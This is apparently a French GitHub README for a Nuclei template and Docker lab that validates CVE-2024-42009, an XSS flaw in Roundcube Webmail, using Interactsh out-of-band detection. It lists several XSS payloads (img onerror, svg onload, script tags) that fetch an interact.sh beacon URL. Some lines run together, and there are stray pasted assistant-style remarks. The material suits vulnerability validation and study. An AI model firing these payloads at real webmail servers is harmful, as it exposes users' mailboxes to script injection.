
Modèles Nuclei et laboratoire Docker pour démontrer et valider CVE-2024-42009, un XSS réfléchi dans Roundcube Webmail, en utilisant la détection hors bande via Interactsh pour les tests autorisés.
Ce dépôt contient un modèle Nuclei et des ressources associées pour démontrer et valider en toute sécurité CVE-2024-42009, une vulnérabilité critique de XSS réfléchi dans Roundcube Webmail. Le défaut réside dans la fonction message_body() de show.php, où des modifications post-assainissement entraînent un désassainissement et un rendu non sécurisé de contenu d'e-mail HTML contrefait.
⚠️ Cette preuve de concept (PoC) est destinée uniquement à des tests éducatifs et autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement la permission de tester.
message_body() dans show.phpCe dépôt utilise la détection hors bande (OOB) via Interactsh pour confirmer l'exécution de JavaScript dans un laboratoire contrôlé.
<body> contenant onanimationstart et un beacon vers InteractshUtilisez le fichier Docker Compose fourni pour démarrer une instance Roundcube locale avec MailHog (réceptacle SMTP) et MariaDB.
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
http://localhost:8080http://localhost:8025⚠️ N'utilisez pas votre compte Google.
CVE-2024-42009-OOB.yaml – Modèle Nuclei avec détection Interactsh et hors bande (OOB)CVE-2024-42009.yaml – Modèle Nuclei sans Interactsh ni OOBdocker-compose.yml – Configuration de l'environnement de laboratoire pour Roundcube WebmailImages/ – Captures d'écran montrant les requêtes HTTP/DNS provenant d'InteractshCette vidéo parcourt l'ensemble de la chaîne d'exploitation :
Pour inclure ces payloads XSS de manière responsable dans votre README, vous voudrez les placer dans une section clairement étiquetée à des fins éducatives ou de test. Voici une structure suggérée :
⚠️ Avertissement : Ces payloads sont destinés uniquement à un usage éducatif et à des tests de sécurité autorisés. Ne les déployez pas sur des systèmes sans autorisation explicite.
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">
<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/main/x" onerror="fetch('https://interact.sh/hit')">
<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>
<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>
<!-- JavaScript in iframe src -->
https://interact.sh/hit par votre propre endpoint d'écoute.Mettez à jour Roundcube vers :
Parfait — voici une section Références propre et professionnelle que vous pouvez inclure dans votre README ou votre soumission par e-mail pour CVE-2024-42009. Elle cite toutes les sources que vous avez listées, formatées pour plus de clarté et de crédibilité :